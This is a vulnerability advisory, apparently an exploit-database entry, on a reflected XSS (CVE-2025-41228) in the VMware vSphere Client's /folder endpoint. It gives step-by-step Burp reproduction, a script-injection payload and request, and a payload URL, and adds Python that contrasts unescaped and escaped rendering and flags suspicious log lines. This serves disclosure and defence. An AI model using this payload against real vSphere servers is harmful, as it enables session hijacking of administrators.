# VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Exploit Title**: VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Date**: 2025-08-08
- **Exploit Author**: Imraan Khan (Lich-Sec)
- **Vendor Homepage**: [https://www.vmware.com](https://www.vmware.com)
- **Version**: vSphere Client 8.0.3.0
- **Tested On**: Web interface (Chrome 138)
- **CVE**: CVE-2025-41228
- **Category**: WebApps
---
## Description
A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize or encode input passed via the query string to the `/folder` endpoint; the reflected value is rendered unencoded into an HTML form’s `action` attribute, resulting in arbitrary JavaScript execution.
The vulnerability was confirmed by intercepting a request through Burp Suite and injecting a malicious payload. This XSS only successfully executes when the response is rendered by a browser within an **active session**, such as one initiated via prior authentication.
---
## Steps to Reproduce
### 1. Initiate request to vulnerable endpoint
Open a browser and navigate to:
```
https://host/folder?ht7j4
```
This sends a benign request that you will intercept.
---
### 2. Intercept and modify the request using Burp Suite
With Burp Suite proxy enabled, capture the request and modify the query string to inject the XSS payload:
```
GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml
```
Then forward the request to the server.
---
### 3. Observe the reflected payload in the HTTP response
In the Burp HTTP Response, the payload appears unencoded within the HTML:
```html
<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
<input name="VMware-CSRF-Token" type="hidden" value="..." />
```
This confirms that the payload is reflected unencoded into a dangerous context, a form’s `action` attribute: the `">` sequence terminates the attribute and the `<form>` tag, so the injected `<script>` element lands in element content and executes.
---
### 4. Trigger script execution
Because the payload is reflected but only executes when the response is rendered by a browser with an active session, use one of the following to observe the popup:
- Forward the exact same malicious request using Burp **with an authenticated session (cookies included)**.
- OR, use Burp's **"Open in Browser"** feature (with session cookies) to request the full response as a browser would.
Upon rendering the page, the browser will execute the injected `<script>`.
Example payload URL:
```
https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1
```
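As an added example (not code from this advisory or from VMware), the following Python models the rendering context shown in step 3 beside the attribute-encoded version that removes the bug, and runs a simple triage filter over constructed access-log lines; the `/folder` path comes from the advisory, while the log layout and sample IPs are assumptions.

```python
"""Added example; not code from the advisory or from VMware.
Models step 3's rendering (raw query string inside a form action attribute),
the attribute-encoded form that closes the hole, and a triage filter over
constructed access-log lines for requests to /folder with breakout characters.
"""
import html
import re
from urllib.parse import unquote, urlsplit

# Constructed from the advisory's step 2 request: the reflected query string.
PAYLOAD_QUERY = 'ht7j4"><script>alert(\'ThisIsAnXSSBug\')</script>tnkav=1'

def render_vulnerable(query: str) -> str:
    """Mirror the observed behaviour: the raw query string lands in the attribute."""
    return f'<form action="/folder?{query}" method="POST">'

def render_hardened(query: str) -> str:
    """Attribute-encode the reflected value; '"', '<' and '>' become entities,
    so the value can neither close the attribute nor open a new tag."""
    return f'<form action="/folder?{html.escape(query, quote=True)}" method="POST">'

def contains_live_tag(markup: str) -> bool:
    """True if a literal <script tag open survives in the markup, i.e. the
    reflected value escaped the quoted attribute."""
    return "<script" in markup.lower()

# Constructed access-log lines; the second carries the URL-encoded step 2 payload.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Aug/2025:10:00:01 +0000] "GET /folder?ht7j4 HTTP/2" 200 512
10.0.0.5 - - [08/Aug/2025:10:00:09 +0000] "GET /folder?ht7j4%22%3E%3Cscript%3Ealert(1)%3C/script%3Etnkav=1 HTTP/2" 200 640
10.0.0.7 - - [08/Aug/2025:10:01:00 +0000] "GET /ui/ HTTP/2" 200 1024
"""

_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
_BREAKOUT = re.compile(r'["<>]')  # characters that can end an attribute or start a tag

def flag_requests(log_text: str) -> list:
    """Return request targets for /folder whose decoded query string could
    break out of the action attribute; a quick triage filter, not a full WAF."""
    hits = []
    for line in log_text.splitlines():
        match = _REQUEST.search(line)
        if not match:
            continue
        target = match.group(1)
        parts = urlsplit(target)
        if parts.path == "/folder" and _BREAKOUT.search(unquote(parts.query)):
            hits.append(target)
    return hits
```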
---
## Impact
Successful exploitation results in arbitrary JavaScript execution within the vSphere Client’s web interface. This could be leveraged for phishing, session hijacking, or further compromise of the admin's browser session.
---
## Recommendation
Upgrade to VMware vCenter Server version **8.0 U3e or later**, which remediates **CVE-2025-41228**.
---
## References
- https://nvd.nist.gov/vuln/detail/CVE-2025-41228
- https://www.vmware.com/security/advisories